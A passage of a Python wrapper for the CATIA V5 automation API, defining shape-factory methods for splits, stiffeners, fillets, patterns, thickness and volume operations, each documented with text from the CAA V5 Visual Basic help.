| This kind of fillet begins with tangency on a first face iF1, gets tangent
| to a second one iRemovedFace and ends with tangency to a third one iF2. During
| the process the second face iRemovedFace is removed.
|
| Parameters:
|
| iF1
| The starting face for the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The ending face for the fillet
| The following Boundary object is supported: Face.
| iRemovedFace
| The face used as an intermediate tangent support for the fillet during
| its course from iF1 to iF2. This face will be removed at the end of the
| filleting operation.
| The following Boundary object is supported: Face
| Returns:
| The created tritangent fillet
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(
self.shape_factory.AddNewSolidTritangentFillet(i_f1.com_object, i_f2.com_object, i_removed_face.com_object))
def add_new_split(self, i_splitting_element: Reference, i_split_side: int) -> Split:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSplit(Reference iSplittingElement,
| CatSplitSide iSplitSide) As Split
|
| Creates and returns a new split operation within the current
| body.
|
| Parameters:
|
| iSplittingElement
| The face or plane that will split the current body
| The following
|
| Boundary object is supported: Face.
| iSplitSide
| The specification for which side of the current body should be kept at
| the end of the split operation
| Returns:
| The created split operation
:param Reference i_splitting_element:
:param int i_split_side:
:return: Split
:rtype: Split
"""
return Split(self.shape_factory.AddNewSplit(i_splitting_element.com_object, i_split_side))
def add_new_stiffener(self, i_sketch: Sketch) -> Stiffener:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewStiffener(Sketch iSketch) As Stiffener
|
| Creates and returns a new stiffener within the current
| body.
| A stiffener is made up of a sketch used as the stiffener profile, that is
| extruded (offset) and that fills the nearest shape.
|
| Parameters:
|
| iSketch
| The sketch defining the stiffener border. It must contain a line or
| a curve that does not cross in 3D space the face(s) to stiffen.
|
|
| Returns:
| The created stiffener
:param Sketch i_sketch:
:return: Stiffener
:rtype: Stiffener
"""
return Stiffener(self.shape_factory.AddNewStiffener(i_sketch.com_object))
def add_new_stiffener_from_ref(self, i_profile_elt: Reference) -> Stiffener:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewStiffenerFromRef(Reference iProfileElt) As
| Stiffener
|
| Creates and returns a new stiffener within the current
| body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the stiffener profile
|
|
| Returns:
| The created stiffener
:param Reference i_profile_elt:
:return: Stiffener
:rtype: Stiffener
"""
return Stiffener(self.shape_factory.AddNewStiffenerFromRef(i_profile_elt.com_object))
def add_new_surface_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Creates and returns a new surface edge fillet with a constant radius.
| within the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iRadius
| The fillet radius
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewSurfaceEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_radius))
def add_new_surface_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int,
i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Creates and returns a new surface edge fillet with a varying radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iVariationMode
| Controls the law of evolution for the fillet radius between specified
| control points, such as edges extremities
| iDefaultRadius
| The fillet default radius, that will apply when no other radius can be
| inferred from the iVariationMode parameter
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewSurfaceEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_surface_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Creates and returns a new surface face-to-face fillet.
| Use this method to created face-to-face fillets with varying fillet radii,
| by editing fillet attributes driving its radius after its
| creation.
|
| Parameters:
|
| iF1
| The first face that will support the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The second face that will support the fillet
| The following Boundary object is supported: Face.
| iRadius
| The fillet radius
| Returns:
| The created face-to-face fillet
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewSurfaceFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_surface_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Creates and returns a new surface tritangent fillet within the current
| body.
| This kind of fillet begins with tangency on a first face iF1, gets tangent
| to a second one iRemovedFace and ends with tangency to a third one iF2. During
| the process the second face iRemovedFace is removed.
|
| Parameters:
|
| iF1
| The starting face for the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The ending face for the fillet
| The following Boundary object is supported: Face.
| iRemovedFace
| The face used as an intermediate tangent support for the fillet during
| its course from iF1 to iF2. This face will be removed at the end of the
| filleting operation.
| The following Boundary object is supported: Face
| Returns:
| The created tritangent fillet
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(self.shape_factory.AddNewSurfaceTritangentFillet(i_f1.com_object, i_f2.com_object,
i_removed_face.com_object))
def add_new_surfacic_auto_fillet(self, i_fillet_radius: float) -> AutoFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicAutoFillet(double iFilletRadius) As
| AutoFillet
|
| Creates and returns a new Surfacic autofillet.
| Use this method to create autofillet by providing fillet radius
| value.
|
| Parameters:
|
| iFilletRadius
| The fillet radius
|
| Returns:
| The created autofillet
:param float i_fillet_radius:
:return: AutoFillet
:rtype: AutoFillet
"""
return AutoFillet(self.shape_factory.AddNewSurfacicAutoFillet(i_fillet_radius))
def add_new_surfacic_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool,
i_rotation_angle: float, i_is_radius_aligned: bool,
i_complete_crown: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned,
| boolean iCompleteCrown) As CircPattern
|
| Creates and returns a new gsd circular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| The following
|
| Boundary objects are supported: PlanarFace , CylindricalFace ,
| RectilinearTriDimFeatEdge and RectilinearBiDimFeatEdge.
|
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying the
| pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
| iCompleteCrown
| The boolean flag specifies the mode of angular distribution. True
| indicates that the angular step will be equal to 360 degrees iNba.
|
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:param bool i_complete_crown:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewSurfacicCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir,
i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle,
i_is_radius_aligned, i_complete_crown))
def add_new_surfacic_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int,
i_shape_to_copy_position_along_dir2: int, i_dir1: Reference, i_dir2: Reference,
i_is_reversed_dir1: bool, i_is_reversed_dir2: bool,
i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| Creates and returns a new GSD rectangular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| The following
|
| Boundary objects are supported: PlanarFace, RectilinearTriDimFeatEdge,
| RectilinearBiDimFeatEdge.
| iDir2
| The line or linear edge that specifies the pattern second repartition
| direction
| The following Boundary objects are supported: PlanarFace,
| RectilinearTriDimFeatEdge, RectilinearBiDimFeatEdge.
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of iDir1
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of iDir2
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a rectangular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(
self.shape_factory.AddNewSurfacicRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle))
def add_new_surfacic_sew_surface(self, i_type: int, i_support_surface: Reference, i_sewing_element: Reference,
i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicSewSurface(long iType,
| Reference iSupportSurface,
| Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new volume sewing operation within the current
| OGS/GS.
|
| Parameters:
|
| iType
| Parameter to determine the sewing type. For Volume sewing Type = 4
| iSupportSurface
| The surfacic support on which sew operation will be performed
|
| iSewingElement
| The face or skin or surface that will be sewn on the current volume
| support
| iSewingSide
| The specification for which side of the current volume should be
| kept at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param int i_type:
:param Reference i_support_surface:
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(self.shape_factory.AddNewSurfacicSewSurface(i_type, i_support_surface.com_object,
i_sewing_element.com_object, i_sewing_side))
def add_new_surfacic_user_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicUserPattern(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| Creates and returns a new GSD user pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewSurfacicUserPattern(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_thick_surface(self, i_offset_element: Reference, i_isens_offset: int, i_top_offset: float,
i_bot_offset: float) -> ThickSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThickSurface(Reference iOffsetElement,
| long iIsensOffset,
| double iTopOffset,
| double iBotOffset) As ThickSurface
|
| Creates and returns a new ThickSurface feature.
|
| Parameters:
|
| iOffsetElement
| The skin that will be thicken and added with the current body
|
| iIsensOffset
| The direction of the offset in regard to the direction of the
| normal
| iTopOffset
| The Offset between the iOffsetElement and the upper skin of the
| resulting feature
| iBotOffset
| The Offset between the iOffsetElement and the lower skin of the
| resulting feature
|
| Returns:
| The created ThickSurface feature
:param Reference i_offset_element:
:param int i_isens_offset:
:param float i_top_offset:
:param float i_bot_offset:
:return: ThickSurface
:rtype: ThickSurface
"""
return ThickSurface(
self.shape_factory.AddNewThickSurface(i_offset_element.com_object, i_isens_offset, i_top_offset,
i_bot_offset))
def add_new_thickness(self, i_face_to_thicken: Reference, i_offset: float) -> Thickness:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThickness(Reference iFaceToThicken,
| double iOffset) As Thickness
|
| Creates and returns a new thickness within the current
| body.
|
| Parameters:
|
| iFaceToThicken
| The first face to thicken in the thickening
| process.
| New faces to thicken can be added to the thickness afterwards by
| using methods offered by the created thickness
| The following
|
| Boundary object is supported: Face.
| iOffset
| The thickness of material to be added on the external side of the face
| iFaceToThicken during the thickening process
| Returns:
| The created thickness
:param Reference i_face_to_thicken:
:param float i_offset:
:return: Thickness
:rtype: Thickness
"""
return Thickness(self.shape_factory.AddNewThickness(i_face_to_thicken.com_object, i_offset))
def add_new_thread_with_out_ref(self) -> Thread:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThreadWithOutRef() As Thread
|
| Creates and returns a new thread\tap within the current
| body.
|
| Returns:
| The created Thread
:return: Thread
:rtype: Thread
"""
return Thread(self.shape_factory.AddNewThreadWithOutRef())
def add_new_thread_with_ref(self, i_lateral_face: Reference, i_limit_face: Reference) -> Thread:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThreadWithRef(Reference iLateralFace,
| Reference iLimitFace) As Thread
|
| Creates and returns a new thread\tap within the current
| body.
|
| Parameters:
|
| iLateralFace
| The Face defining the support of thread\tap
| The following
|
| Boundary object is supported: Face.
| iLimitFacee
| The Face defining the origin of the thread.
| The following Boundary object is supported:
| PlanarFace.
| Returns:
| The created Thread
:param Reference i_lateral_face:
:param Reference i_limit_face:
:return: Thread
:rtype: Thread
"""
return Thread(self.shape_factory.AddNewThreadWithRef(i_lateral_face.com_object, i_limit_face.com_object))
def add_new_trim(self, i_body_to_trim: Body) -> Trim:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewTrim(Body iBodyToTrim) As Trim
|
| Creates and returns a new Trim operation within the current
| body.
|
| Parameters:
|
| iBodyToTrim
| The body to Trim with current body.
|
| Returns:
| The created Trim operation
:param Body i_body_to_trim:
:return: Trim
:rtype: Trim
"""
return Trim(self.shape_factory.AddNewTrim(i_body_to_trim.com_object))
def add_new_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Deprecated:
| V5R14 #AddNewTritangentFillet use AddNewSolidTritangentFillet or
| AddNewSurfaceTritangentFillet depending on the type of fillet you want to
| create
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(
self.shape_factory.AddNewTritangentFillet(i_f1.com_object, i_f2.com_object, i_removed_face.com_object))
def add_new_user_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewUserPattern(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| Creates and returns a new user pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewUserPattern(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_user_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewUserPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| V5R8 Only: Creates and returns a new user pattern within the current body
| using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern Others shapes will be
| add by put_ItemToCopy with CATIAPattern interface
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewUserPatternofList(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_volume_add(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Add:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeAdd(Reference iBody1,
| Reference iBody2,
| double iType) As Add
|
| Creates and returns a Volumic Add feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Add feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Add
:rtype: Add
"""
return Add(self.shape_factory.AddNewVolumeAdd(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_close_surface(self, i_close_element: Reference) -> CloseSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeCloseSurface(Reference iCloseElement) As
| CloseSurface
|
| Creates and returns a new VolumeCloseSurface feature.
|
| Parameters:
|
| iCloseElement
| The skin that will be closed and add with the current body
|
|
| Returns:
| The created CloseSurface feature
:param Reference i_close_element:
:return: CloseSurface
:rtype: CloseSurface
"""
return CloseSurface(self.shape_factory.AddNewVolumeCloseSurface(i_close_element.com_object))
def add_new_volume_intersect(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Intersect:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeIntersect(Reference iBody1,
| Reference iBody2,
| double iType) As Intersect
|
| Creates and returns a Volumic Intersect feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Intersect feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Intersect
:rtype: Intersect
"""
return Intersect(self.shape_factory.AddNewVolumeIntersect(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_remove(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Remove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeRemove(Reference iBody1,
| Reference iBody2,
| double iType) As Remove
|
| Creates and returns a Volumic Remove feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Remove feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Remove
:rtype: Remove
"""
return Remove(self.shape_factory.AddNewVolumeRemove(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_sew_surface(self, i_type: int, i_support_volume: Reference, i_sewing_element: Reference,
i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeSewSurface(long iType,
| Reference iSupportVolume,
| Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new volume sewing operation within the current
| OGS/GS.
|
| Parameters:
|
| iType
| Parameter to determine the sewing type. For Volume sewing Type = 4
| iSupportVolume
| The volume support on which sew operation will be performed
|
| iSewingElement
| The face or skin or surface that will be sewn on the current volume
| support
| iSewingSide
| The specification for which side of the current volume should be
| kept at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param int i_type:
:param Reference i_support_volume:
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(
self.shape_factory.AddNewVolumeSewSurface(i_type, i_support_volume.com_object, i_sewing_element.com_object,
i_sewing_side))
def add_new_volume_shell(self, i_face_to_remove: Reference, i_internal_thickness: float,
i_external_thickness: float, i_volume_support: Reference) -> Shell:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeShell(Reference iFaceToRemove,
| double iInternalThickness,
| double iExternalThickness,
| Reference iVolumeSupport) As Shell
|
| Creates and returns a Volumic Shell feature.
|
| Parameters:
|
| iFacesToRemove
| The Faces of the Volume
| iFacesToThicken
| The Faces of the Volume
| iInternalThickness
| The thickness of material to be added on the internal side of all
| the faces during the shell process, except for those to be removed
|
| iExternaThickness
| The thickness of material to be added on the external side of all
| the faces during the shell process, except for those to be removed
|
| iVolumeSupport
| The Volume related the faces to remove and faces to thicken
|
|
| Returns:
| The created Volumic Shell.
:param Reference i_face_to_remove:
:param float i_internal_thickness:
:param float i_external_thickness:
:param Reference i_volume_support:
:return: Shell
:rtype: Shell
"""
return Shell(self.shape_factory.AddNewVolumeShell(i_face_to_remove.com_object, i_internal_thickness,
i_external_thickness, i_volume_support.com_object))
def add_new_volume_thick_surface(self, i_offset_element: Reference, i_isens_offset: int, i_top_offset: float,
i_bot_offset: float) -> ThickSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeThickSurface(Reference iOffsetElement,
| long iIsensOffset,
| double iTopOffset,
| double iBotOffset) As ThickSurface
|
| Creates and returns a new VolumeThickSurface feature.
|
| Parameters:
|
| iOffsetElement
| The skin that will be thicken and added with the current OGS/GS
|
| iIsensOffset
| The direction of the offset in regard to the direction of the
| normal
| iTopOffset
| The Offset between the iOffsetElement and the upper skin of the
| resulting feature
| iBotOffset
| The Offset between the iOffsetElement and the lower skin of the
| resulting feature
|
| Returns:
| The created ThickSurface feature
:param Reference i_offset_element:
:param int i_isens_offset:
:param float i_top_offset:
:param float i_bot_offset:
:return: ThickSurface
:rtype: ThickSurface
"""
return ThickSurface(
self.shape_factory.AddNewVolumeThickSurface(i_offset_element.com_object, i_isens_offset, i_top_offset,
i_bot_offset))
def add_new_volume_thickness(self, i_face_to_thicken: Reference, i_offset: float, i_type: int,
i_volume_support: Reference) -> Thickness:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeThickness(Reference iFaceToThicken,
| double iOffset,
| long iType,
| Reference iVolumeSupport) As Thickness
|
| Creates and returns a volume new thickness within the current GS or
| OGS.
|
| Parameters:
|
| iFaceToThicken
| The first face to thicken in the thickening
| process.
| New faces to thicken can be added to the thickness afterwards by
| using methods offered by the created thickness
| The following
|
| Boundary object is supported: Face.
| iOffset
| The thickness of material to be added on the external side of the face
| iFaceToThicken during the thickening process
| iType
| The mode of thickness creation (4=Volume)
| iVolumeSupport
| The support volume for volumic draft
| Returns:
| The created thickness
:param Reference i_face_to_thicken:
:param float i_offset:
:param int i_type:
:param Reference i_volume_support:
:return: Thickness
:rtype: Thickness
"""
return Thickness(self.shape_factory.AddNewVolumeThickness(i_face_to_thicken.com_object, i_offset, i_type,
i_volume_support.com_object))
def add_new_volume_trim(self, i_support_volume: Reference, i_cutting_volume: Reference) -> Trim:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeTrim(Reference iSupportVolume,
| Reference iCuttingVolume) As Trim
|
| Creates and returns a new Volume Trim operation within the
| GS/OGS.
|
| Parameters:
|
| iSupportVolume
| The Support Volume
| iCutttingVolume
| The trimming Volume
|
| Returns:
| The created Trim operation
:param Reference i_support_volume:
:param Reference i_cutting_volume:
:return: Trim
:rtype: Trim
"""
return Trim(self.shape_factory.AddNewVolumeTrim(i_support_volume.com_object, i_cutting_volume.com_object))
def add_new_volumic_draft(self, i_face_to_draft: Reference, i_neutral: Reference, i_neutral_mode: int,
i_parting: Reference, i_dir_x: float, i_dir_y: float, i_dir_z: float, i_mode: int,
i_angle: float, i_multiselection_mode: int, i_type: int,
i_volume_support: Reference) -> Draft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumicDraft(Reference iFaceToDraft,
